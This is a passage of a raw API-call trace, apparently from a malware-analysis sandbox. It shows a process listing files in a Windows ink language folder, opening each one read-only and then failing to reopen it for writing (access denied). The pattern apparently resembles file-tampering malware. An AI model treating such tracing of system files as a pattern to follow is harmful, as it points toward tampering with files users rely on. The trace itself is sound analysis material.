ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mshwLatin.dll.mui", cAlternateFileName="")) returned 1 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0082.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0082.713] AreFileApisANSI () returned 1 [0082.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui", lpUsedDefaultChar=0x0) returned 75 [0082.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0082.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.714] AreFileApisANSI () returned 1 [0082.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0082.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x859e0 [0082.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui") returned 75 [0082.714] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.715] GetFileType (hFile=0x340) returned 0x1 [0082.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0082.715] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.715] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.715] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.715] CloseHandle (hObject=0x340) returned 1 [0082.716] AreFileApisANSI () returned 1 [0082.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0082.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85260 [0082.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui") returned 75 [0082.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.716] GetLastError () returned 0x5 [0082.716] GetLastError () returned 0x5 [0082.716] SetLastError (dwErrCode=0x5) [0082.716] GetLastError () returned 0x5 [0082.716] SetLastError (dwErrCode=0x5) [0082.716] GetLastError () returned 0x5 [0082.716] SetLastError (dwErrCode=0x5) [0082.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0082.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0082.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.716] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dab1374, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="rtscom.dll.mui", cAlternateFileName="")) returned 1 [0082.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0082.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0082.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0082.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.717] AreFileApisANSI () returned 1 [0082.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0082.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.717] AreFileApisANSI () returned 1 [0082.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0082.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui") returned 72 [0082.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.718] GetFileType (hFile=0x340) returned 0x1 [0082.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0082.718] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.719] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.719] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.719] CloseHandle (hObject=0x340) returned 1 [0082.719] AreFileApisANSI () returned 1 [0082.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0082.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui") returned 72 [0082.719] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.719] GetLastError () returned 0x5 [0082.719] GetLastError () returned 0x5 [0082.719] SetLastError (dwErrCode=0x5) [0082.719] GetLastError () returned 0x5 [0082.720] SetLastError (dwErrCode=0x5) [0082.720] GetLastError () returned 0x5 [0082.720] SetLastError (dwErrCode=0x5) [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0082.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.720] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da18a06, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7f875d00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ShapeCollector.exe.mui", cAlternateFileName="")) returned 1 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0082.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0082.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0082.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0082.721] AreFileApisANSI () returned 1 [0082.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui", lpUsedDefaultChar=0x0) returned 80 [0082.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0082.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.721] AreFileApisANSI () returned 1 [0082.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0082.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 80 [0082.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.722] GetFileType (hFile=0x340) returned 0x1 [0082.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.722] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.722] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.722] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.723] CloseHandle (hObject=0x340) returned 1 [0082.723] AreFileApisANSI () returned 1 [0082.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0082.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 80 [0082.723] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.723] GetLastError () returned 0x5 [0082.723] GetLastError () returned 0x5 [0082.723] SetLastError (dwErrCode=0x5) [0082.723] GetLastError () returned 0x5 [0082.723] SetLastError (dwErrCode=0x5) [0082.723] GetLastError () returned 0x5 [0082.723] SetLastError (dwErrCode=0x5) [0082.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0082.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.723] 